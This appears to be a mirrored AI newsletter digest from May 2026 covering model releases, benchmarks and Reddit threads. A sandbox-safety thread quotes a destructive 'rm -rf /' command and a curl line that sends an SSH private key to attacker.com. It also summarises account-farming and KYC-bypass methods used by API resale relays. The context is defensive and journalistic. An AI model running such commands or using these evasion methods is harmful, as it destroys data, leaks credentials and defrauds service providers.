Smol AI News · May 4, 2026 · 21 min read

not much happened today

Mirrored from Smol AI News for archival readability. Support the source by reading on the original site.

a quiet day.

AI News for 5/4/2026-5/5/2026. We checked 12 subreddits, 544 Twitters and no further Discords. AINews’ website lets you search all past issues. As a reminder, AINews is now a section of Latent Space. You can opt in/out of email frequencies!

AI Twitter Recap

OpenAI’s Math Breakthrough on the Erdős Unit Distance Problem

A general-purpose reasoning model produced a new research result in discrete geometry: OpenAI announced that an internal model disproved a long-standing belief around the planar unit distance problem, a famous Erdős problem from 1946, discovering a new family of constructions that improves on square-grid-style solutions @OpenAI. OpenAI emphasized this was a general-purpose model, not a domain-specific math system or scaffolded solver @OpenAI, and said the result points to stronger long-horizon reasoning for science broadly @OpenAI.
The result drew unusually strong validation from mathematicians and adjacent researchers. Timothy Gowers called it the first really clear example of AI solving a well-known open math problem @wtgowers, while OpenAI researcher Hongxun Wu described it as an internal reasoning-LLM milestone on “the hardest problems” @HongxunWu. Additional reactions from @thomasfbloom, @gdb, @alexwei_, and @polynoamial converged on the same point: this appears qualitatively beyond prior “AI does olympiad math” milestones.
Notable technical subtext: OpenAI says the model was not pushed to the limit and is intended for eventual public use @polynoamial. The published reasoning summary itself is reportedly massive—around 125 pages per @voooooogel—which helped fuel discussion about the practical role of test-time compute in frontier reasoning. Some observers explicitly framed this as further evidence that inference-time scaling is the paradigm carrying current progress @arohan, with others extrapolating to faster future gains in formal science and mathematics @scaling01, @sama.

Cohere Command A+ Open Release and Architecture Discussion

Cohere released Command A+ as Apache 2.0 open weights, positioning it as its most powerful model yet and explicitly optimized for low hardware requirements @cohere, with the licensing clarified in a follow-up @cohere. The release is significant partly because it is Cohere’s first fully open Apache 2 model per @aidangomez. Community reaction focused on this as a meaningful shift toward more permissive, deployable enterprise-grade open models @nickfrosst, @ClementDelangue.
The model details repeated across multiple posts: roughly 218B MoE / 25B active, multimodal, 48 languages, and runnable on relatively modest setups @JayAlammar, @mervenoyann. vLLM day-0 support landed quickly, including a note that it can run on as little as 2× H100s at W4A4 @vllm_project.
Benchmarks painted a mixed but credible picture: Artificial Analysis placed Command A+ at 37 on its Intelligence Index, around Claude 4.5 Haiku territory, with especially strong non-hallucination behavior and decent speed, but weaker scientific reasoning and coding than top peer models @ArtificialAnlys. The community also dug into the architecture: unusual choices called out include a parallel transformer block, large shared expert usage, LayerNorm over RMSNorm, relatively low 32-layer depth, and atypical head/expert configurations @eliebakouch, @rasbt, @stochasticchasm. This made the release notable not just as a model drop but as an architectural data point.

Benchmarks for Agents, Memory, and Scientific Workflows

InferenceBench is one of the day’s most technically substantive releases. It targets AI R&D automation through open-ended inference optimization tasks, and the headline is negative for current frontier agents: they struggle with system-level engineering, dependency management, and broad exploration, underperforming a simple baseline of vLLM/SGLang hyperparameter tuning @maksym_andr. The thread also reports an apparent inverse scaling effect, where models like Claude Sonnet 4.6 and GLM-5 rank well because they preserve robust final states, while larger models often produce brittle end configurations.
Terminal-Bench Science extends agent evaluation from coding into real scientific workflows, with task contributions now open @StevenDillmann. In parallel, MINTEval targets long-context memory systems under frequent updates and interference: average instance length is 138.8k tokens with up to 1.8M, yet across 7 systems the average accuracy is only 27.9%, with the best at 33.4% @hyunji_amy_lee. This complements a growing line of work arguing that memory should be a dedicated learned subsystem rather than just RAG/context stuffing @dair_ai.
On the human side of interaction research, ThoughtTrace introduced a large-scale dataset of users’ self-reported thoughts during real LLM conversations: 10,174 thought annotations, 2,155 multi-turn conversations, 1,058 users, 20 models. Reported gains include +41.7% for user behavior prediction and +25.6% for alignment @chuanyang_jin. This is one of the more concrete attempts to instrument the “latent user state” that conversation logs alone miss.

Google I/O Follow-Through: Gemini 3.5 Flash, Omni, AI Studio, and Antigravity

Gemini 3.5 Flash began broader rollout in the Gemini app, including free access globally @GeminiApp, @GeminiApp. Google framed it as its strongest agentic and coding model yet, claiming frontier performance at 4× the speed of comparable models and under half the cost @Google. However, external discussion was much more mixed, with multiple posts questioning real-world cost/performance and token efficiency despite favorable launch-stage benchmark positioning @ArtificialAnlys, @scaling01, @giffmana.
Gemini Omni appears to have made the bigger qualitative impression than 3.5 Flash. Google positioned it as a conversational multimodal creation/editing model for video and mixed-input workflows @Google, with Gemini app demos showing conversational video editing @GeminiApp. Early reactions generally treated Omni as a more differentiated product than the core LLM refresh @scaling01.
On tooling, AI Studio pushed harder toward end-to-end developer workflow and mobile access @GoogleAIStudio, while several posts tried to decode the relation between Gemini Spark, Antigravity, and Google’s internal/external agent harnesses @simonw, @_philschmid. A more concrete Antigravity-adjacent update was the launch of Science Skills for Google’s agent stack, integrating 30+ life-science sources such as UniProt and AlphaFold DB @GoogleDeepMind.

Agent Infrastructure, Retrieval, and Dev Tooling

Several posts converged on the same operational lesson: agents fail on infra reality before they fail on demos. That theme shows up in the qualitative thread on research agents fighting dependency conflicts and configs @jehyeoky248, in LangChain’s push for LangSmith Sandboxes GA @LangChain, and in newer lighter-weight code interpreter support for deepagents as a middle ground between pure tool execution and full sandboxes @sydneyrunkle, @hwchase17.
In retrieval/search infra, Perplexity described a productionized query-aware, citation-preserving context compression system that cuts context tokens by up to 70% while improving answer quality, and claims 50× compression on SimpleQA at frontier-level performance @perplexity_ai. Weaviate 1.37 added MMR reranking to improve diversity in vector retrieval for RAG/agents @weaviate_io, while SID-1 was presented as an RL-trained agentic search model with 1.9× recall over RAG+rerank, 24× faster, and 99% cheaper than GPT-5.1 in the cited setup @turbopuffer.
Cursor, VS Code, and Codex all shipped notable workflow updates. Cursor added automations in the agents workspace @cursor_ai, VS Code shipped better markdown/HTML previews, remote session continuity, and utility-model configurability @code, @pierceboggan. On the model side, Composer 2.5 posted a strong coding-agent showing—62 on the Artificial Analysis Coding Agent Index at much lower cost than top Opus/GPT-5.5 variants @ArtificialAnlys. OpenAI also shipped Codex on mobile @OpenAIDevs.

Top Tweets (by engagement)

OpenAI math milestone: OpenAI’s announcement of the unit-distance breakthrough was the most consequential technical post in the set, both for scientific novelty and for what it implies about long-horizon reasoning @OpenAI.
Cohere Command A+ open release: One of the largest model-release stories of the day, mainly because of the Apache 2.0 license and unusual architecture @cohere.
Anthropic compute expansion with SpaceX/Colossus: Anthropic is reportedly scaling up on Colossus 2 capacity @nottombrown, with follow-on posts citing a filing that values the SpaceX compute agreement at $1.25B/month through May 2029 @SemiAnalysis_.
Exa funding: Exa raised $250M Series C at a $2.2B valuation, explicitly framing itself as a search lab organizing web data for agents @ExaAILabs.

AI Reddit Recap

/r/LocalLlama + /r/localLLM Recap

1. Qwen3.7 Preview and 27B Roadmap

Qwen is cooking hard (Activity: 1292): The image is a screenshot of Chujie Zheng teasing that Qwen is “cooking hard”, quoting an announcement that Qwen3.7 Preview is now on Arena with Qwen3.7-Max-Preview and Qwen3.7-Plus-Preview; the post claims Alibaba ranks #6 in Text and #5 in Vision. In context, the Reddit title/selftext indicate users are anticipating larger and refreshed open-weight models—especially 122B and a new 27B—though the screenshot itself is mainly a teaser rather than a technical benchmark breakdown. Image Commenters are split between excitement for high-end models and practical interest in smaller local models: some want 9B/4B variants for low-end hardware, while others hope for 122B, a better 35B, or joke that Qwen may soon be “cooking” their GPU.
- Several commenters focused on model-size coverage rather than the current 27B release, saying they cannot practically run it and are hoping for smaller Qwen 4B/9B variants for low-end or laptop GPUs. There was also interest in larger 122B and improved 35B checkpoints, though one commenter noted prior 122B mentions around Qwen 3.6 never materialized, raising uncertainty about whether a Qwen 3.7 122B will actually ship.
Qwen3.7 Max scored by Artificial Analysis, 27B/35B waiting room (Activity: 553): A Reddit post highlights an Artificial Analysis leaderboard screenshot where Qwen3.7 Max ranks 5th, roughly level with GPT 5.4 (xhigh) and slightly ahead of Gemini 3.5 Flash. The author notes Qwen3.6 27B trails its Max counterpart by exactly 6 points and hopes upcoming Qwen3.7 27B/35B variants land close to the Max model’s performance. Commenters are mainly “waiting eagerly for the open weight models” and view the score as evidence that the Qwen team is now competitive with major labs, despite concerns that the Max model is not open-source. One technical concern raised is whether Qwen has fixed its prior tendency toward “overthinking.”
- Commenters focused on whether Qwen3.7 Max represents a genuine architectural update versus another finetune/iteration of the Qwen3.5/Qwen3.6 architecture; one noted that extracting more performance from the same base architecture would still be technically notable.
- Several users are waiting for potential open-weight 27B/35B variants, but one commenter speculated there may be no Qwen 3.7 27B at all, arguing that “Qwen 3.7” could simply be a private large model similar to Qwen 3.6 390B A30B rather than a full public model family.
- A technical concern raised was whether the Qwen team has addressed the model’s reported “overthinking” behavior, implying interest in improvements to reasoning-token efficiency, response latency, and controllability rather than just benchmark gains.
Qwen will release another 27B with high probability (Activity: 1162): The image is a screenshot of an X/Twitter exchange where xiong-hui (barry) chen says Qwen is “waiting for the exact roadmap” but believes there is a high probability of another 27B release, framed by the post title as a likely follow-up to the highly regarded Qwen 3.6 27B. The technical significance is speculation around Qwen continuing to optimize parameter efficiency / “intelligence density” in the mid-size dense-model range rather than only scaling to much larger MoE models. Commenters mostly discuss local-inference practicality: some want a larger 122B-A10B MoE model, while others argue that 27B is too heavy for 16GB VRAM users and prefer a 35B/A3B-style MoE that can run on consumer gaming laptops or hybrid CPU/GPU setups.
- Several commenters discussed the local-inference gap around 27B models: users with 16GB VRAM argued that a 27B model is difficult to run at a usable quantization level, while a hypothetical Qwen 35B MoE / A3B-style model could be more practical via hybrid CPU/GPU inference and would remain accessible on gaming laptops.
- There was interest in larger dense Qwen variants, especially 50B–80B, with one commenter noting that Qwen 27B is already very fast with MTP and they would trade some generation speed for higher parameter count and potentially better quality.
- Model-size requests clustered around both MoE and dense scaling paths: proposed targets included Qwen 3.7 122B-A10B, 50B–80B MoE, and dense 10B, 20B, 30B, 50B, or 80B releases, reflecting demand for both high-end quality and locally runnable tiers.

2. Open Model Releases: Lance 3B and Command A+

bytedance released an open source model that attempts to do just about anything with only 3b parameters (Activity: 830): ByteDance Research released Lance, a native unified multimodal model advertising 3B active parameters for image/video understanding, text-to-image/text-to-video generation, and image/video editing, trained from scratch with a staged multi-task recipe on a 128×A100 budget. Commenters noted that “3B active” likely understates the deployed footprint: the HF model card requires ≥40GB VRAM, with safetensors around 24.7GB for Lance_3B and 28.4GB for Lance_3B_Video; one commenter described it as a composite BAGEL-style system combining a tuned WAN 2.2 3B Video model, a 3B pixel-space image model, and Qwen2.5-VL-3B as the VLM backbone. Discussion focused on whether the small active-parameter count can maintain quality on complex scenes, and criticism that the shipped Gradio demo is under-featured—reportedly covering only basic T2V and VQA while omitting VLM chat, T2I, and agent-style interactions. One commenter argued the 40GB requirement may be reducible by loading/unloading submodels on demand, trading memory for latency.
- Commenters clarified that the release is not simply a dense 3B model: it is described as 3B active parameters, while the downloadable safetensors are much larger—about 24.7GB for Lance_3B and 28.4GB for Lance_3B_Video. The model card reportedly requires a GPU with at least 40GB VRAM for inference, suggesting substantial inactive/auxiliary weights or multiple resident components beyond the advertised active parameter count.
- A technical breakdown described the model as a composite system based on the BAGEL architecture, combining a custom-tuned WAN 2.2 3B Video model, a 3B pixel-space image model, and Qwen2.5-VL-3B as the VLM backbone. One commenter noted that the 40GB VRAM requirement likely assumes all submodels remain loaded simultaneously; dynamic loading/unloading could reduce peak memory use at the cost of slower end-to-end generation.
- The shipped demo was criticized as technically incomplete: commenters said the Gradio interface only supports basic text-to-video and VQA, while omitting showcased capabilities such as VLM chat, text-to-image, and agent-style interaction. This was framed as a common issue with multi-capability model releases where the demo does not expose the full architecture’s functionality.
Re. what ever happened to Cohere’s Command-A series of models? (Activity: 439): Cohere announced Command A+, its first MoE open-weights model, positioned as a highly efficient/low-latency enterprise-agent model rather than purely top-line benchmark leader; Cohere claims strong quantization work enabling practical deployment on 1–2 GPUs and is releasing it under Apache 2.0 for broad commercial use (announcement, prior Reddit context from cofounder Aidan here). Nick Frosst explicitly frames the release as influenced by community feedback and as a continuation of the Command/R-series focus on practical agent-building for smaller teams and developers. Comments were broadly positive about Cohere returning to competitive open-weight releases, with one noting the original Command R+ was “legendary” for creative/resource-planning workflows. The main technical ask from commenters was for GGUF availability for local inference.
- A commenter questioned the new Cohere Command-A model’s competitiveness due to the absence of standard benchmark reporting or comparisons against current similarly sized SOTA models, specifically naming MiniMax M2.7 and MiMo v2.5. They referenced an “Artificial Analysis” benchmark image shared by Nick/Cohere, implying that without broader benchmark coverage the release may struggle to gain technical adoption.
- Several users contrasted the new release with the original Command R+, which they viewed as unusually strong for its time, especially for creative work, planning, and enterprise use cases. One technical concern was that newer Cohere models may have shifted away from the properties that made Command R/R+ attractive, with claims of lower-quality synthetic/outsourced data and increased refusal behavior resembling GPT-OSS-style safety tuning.
- There was interest in local inference support, specifically a request for GGUF availability. Another commenter noted that Cohere’s prior licensing discouraged backend/runtime maintainers from implementing support, which allegedly prevented broader access to features such as Command-A vision support.

3. Claude Relay Abuse and Agent Sandbox Safety

I spent a week researching the Chinese “transfer station” economy reselling Claude at 10% of retail. The supply chain is wilder than I expected. (Activity: 1075): The image is an article-preview screenshot from X about a reported Chinese “transfer station” economy reselling Claude/Anthropic API access at steep discounts, framed as a “token smuggle / inference exfiltration” map from Chinese AI firms to U.S. Claude endpoints: image. The post’s technical claim is that these relays use farmed Anthropic accounts, residential proxies, TLS fingerprint spoofing, SMS/SIM-bank verification, KYC bypasses, and open-source relay stacks like one-api, new-api, claude-relay-service, claude2api, clewdr, and clove to multiplex many users over pooled OAuth tokens. It also highlights alleged quality/security risks: a cited CISPA Helmholtz audit found up to 47.21% performance drops and 45.83% model-fingerprint failures from relays silently substituting Haiku/GLM/Qwen for “Opus,” while all prompts/responses may be logged for distillation datasets. Comments largely found the supply-chain details plausible but alarming, especially the model-substitution and KYC-bypass claims. One commenter questioned the provenance of the audit evidence—whether Anthropic, internal telemetry, or honeypot/fake-customer testing was used—while another argued cheap inference may disappear once subsidized token pricing ends.
- One commenter highlights the post’s claim that a CISPA Helmholtz audit of 17 relay endpoints found severe model-substitution issues: up to 47.21% performance degradation versus the official API, and 45.83% of endpoints failing model-fingerprint verification. The technical concern is that relays may silently downgrade paid “Opus” requests to cheaper models like Claude Haiku, GLM, or Qwen while relabeling the output.
- A commenter questions the methodology behind the relay-audit claims, asking whether the results came from Anthropic telemetry, internal server-side investigation, honeypots, or disguised customer accounts. This is a substantive point because verifying unauthorized API resale requires distinguishing external black-box benchmarking from provider-side account tracing or supply-chain infiltration.
- Another commenter summarizes the likely operating model: automated fake-account creation plus multi-user account sharing, with all prompts and conversations potentially logged in the reseller’s database. The comment flags a major security/privacy risk: relay operators can monetize user data through resale, model training, or other downstream use, in addition to arbitraging subsidized inference access.
got my first “rm -rf /” today (Activity: 614): An agent testing a newly implemented Bash command whitelist attempted to run the destructive command rm -rf /; the block apparently succeeded, preventing filesystem damage but prompting immediate addition of Bubblewrap (bwrap) isolation/sandboxing. The author clarified the whitelist was implemented before the sandbox, and the agent selected rm -rf / specifically to verify the harmful-command filter. A commenter noted that filesystem safeguards are not enough because agents can also perform destructive version-control operations such as rewriting Git history, suggesting Git configuration and permissions should be reviewed as part of sandbox hardening.
- A commenter emphasized that sandboxing should restrict network egress, not just filesystem writes: preventing rm -rf / is insufficient if an agent can run curl attacker.com -d "$(cat ~/.ssh/id_rsa)" and exfiltrate secrets. They suggested Docker --network=none for agent shells, allowing only explicit outbound access when required, and for non-Docker setups using unshare --user --pid --mount --net --fork to create a lightweight network-isolated shell with writable tmpfs overlay and read-only host filesystem.
- Another technical caution noted that Git history can be rewritten, so recovery and audit assumptions should include reviewing Git configuration and protections against destructive history changes, not just local filesystem deletion.

Less Technical AI Subreddit Recap

/r/Singularity, /r/Oobabooga, /r/MachineLearning, /r/OpenAI, /r/ClaudeAI, /r/StableDiffusion, /r/ChatGPT, /r/ChatGPTCoding, /r/aivideo, /r/aivideo

1. Anthropic Talent and Support Strains

Karpathy joins Anthropic (Activity: 6494): The image is not a meme; it is a screenshot of an X post in which Andrej Karpathy says he has joined Anthropic to return to frontier LLM R&D while pausing his education-focused work until later (image). Contextually, the Reddit title “Karpathy joins Anthropic” frames this as a major talent move in the frontier-model race, given Karpathy’s prior prominence in deep learning, LLM education, and industry AI research. Comments mostly treat the move as AI-industry drama rather than technical news, comparing it to a superstar joining the strongest team and implying Anthropic currently has one of the best rosters. There is also a negative jab at Sam Altman/OpenAI, suggesting commenters read the move as competitively significant.
Paid $118 for Claude Max, ignored by support for days. So I served a formal legal notice to Anthropic’s new India office. (Activity: 1901): The image is non-technical: it shows a printed “LEGAL NOTICE” addressed to Anthropic India Private Limited regarding the poster’s claimed $118 Claude Max payment that allegedly did not provision the account beyond the Free tier. In context, the post alleges a billing/provisioning failure and lack of human support after multiple bot-handled tickets, framing it as a consumer-protection dispute rather than a model or API issue. Image Comments are skeptical that the legal notice will produce results, with one user saying “Update us if ANYTHING happens. It won’t.” Others advise sending notice to Anthropic’s U.S. office and criticize modern AI/SaaS companies for minimizing human customer support behind bots.
- A detailed billing-failure report describes 375 unexplained Anthropic charges totaling ~$6,000 despite the user being on the $100 Max plan, with charges ranging from about $5 to $23 and occurring across two separate Amex cards. The commenter suspects a backend state-sync bug during plan upgrades where usage may have been incorrectly treated as paid “extra usage,” but notes that none of the charges appeared in Claude billing, usage pages, API usage, auto top-up, or account records, making reconciliation impossible from the user side.

2. Agentic OS Builds and Image LoRA Workflows

Google’s Antigravity 2.0 creates an operating system from scratch using 96 agents in 12 hours for under $1K in token costs - and it runs Doom (Activity: 2520): The post claims Google Antigravity 2.0 orchestrated 96 agents over 12 hours to build a from-scratch operating system for under $1K in token costs, with the resulting OS reportedly able to run Doom. The linked Reddit-hosted video (https://v.redd.it/19n7bckes42h1) was inaccessible due to a 403 Forbidden response, so no implementation details, benchmarks, architecture, or reproducible evidence could be verified from the source. Comments were mostly non-technical jokes, but one commenter questioned the economics, arguing that a single agent can consume $100 in tokens in under an hour and suggesting the claimed cost may be off by orders of magnitude.
- One commenter questioned the reported token-cost claim: 96 agents running for 12 hours for under $1K seems implausibly low compared with their own experience of spending $100+ in under an hour with a single agent. The implication is that either the agents used very cheap/limited models, aggressive context pruning, constrained workloads, or the headline cost omits substantial compute/tooling overhead.
Extreme realism with Klein 9B distilled 2 loras together (Activity: 1716): The post claims Klein 9B Distilled / Flux2 Klein Base 9B achieves unusually high photorealism by stacking multiple LoRAs: Better Skin Concept 2.0 + Smartphone Snapshot Photo Reality v13.0 OMEGA, optionally combined with SNof 1.3. The author says all samples were pure text-to-image, with no editing/upscaling, generated on an RTX 3060 Ti 8GB, and argues Klein can run 3 LoRAs at weight 1.0 each without visual degradation, unlike Z Image Turbo, which they claim struggles beyond 2 LoRAs or weights above ~1.4. Commenters mostly reacted to perceived realism, including one saying some images made them doubt they were AI-generated; another reply appeared skeptical/critical but did not add technical detail.

3. Paid AI Plan Usage Limits

8 minutes of chatting with Pro and I’m at 100% usage with this new update. Is this a joke? Pro subscription btw (Activity: 1980): A mobile screenshot of Google Gemini’s Pro “Usage limits” page shows the user hitting 100% of the current limit after ~8 minutes of chatting, despite a separate weekly limit showing only 5% used; the page also upsells a higher tier promising “20x more usage than AI Pro” for $409.99/month (image). The post is technically relevant as an example of increasingly granular/opaque quota enforcement in consumer LLM products, likely reflecting per-model, per-window, or compute-cost-based throttling rather than a simple weekly message cap. Commenters frame this as Google adopting Anthropic-style restrictive limits, with concern that paid AI subscriptions are becoming more aggressively metered as providers try to recover inference costs. Several express surprise that Google, despite its infrastructure scale, would appear compute-constrained or would push users toward very expensive higher-usage plans.
- Users report severe quota reductions on Gemini Pro, including one claim of reaching 100% usage after only 8 minutes of chat and another hitting a weekly limit. The thread frames this as a shift from generous consumer AI access toward stricter compute rationing despite paid subscription status.
- Several comments interpret the new limits as evidence that even Google is treating frontier-model inference as compute-constrained, with users comparing it to Anthropic-style usage caps. One commenter specifically criticizes Flash Lite as a degraded fallback model, implying the quota system may be pushing paid users onto lower-capability models more often.
- Pricing is a major technical-access concern: users contrast a low-cost Pro subscription around $6.99/month with much higher-tier AI pricing cited as $409.99/month, arguing that advanced model access is becoming economically gated rather than broadly available.

AI Discords

Unfortunately, Discord shut down our access today. We will not bring it back in this form but we will be shipping the new AINews soon. Thanks for reading to here, it was a good run.

Discussion (0)

No comments yet. Sign in and be the first to say something.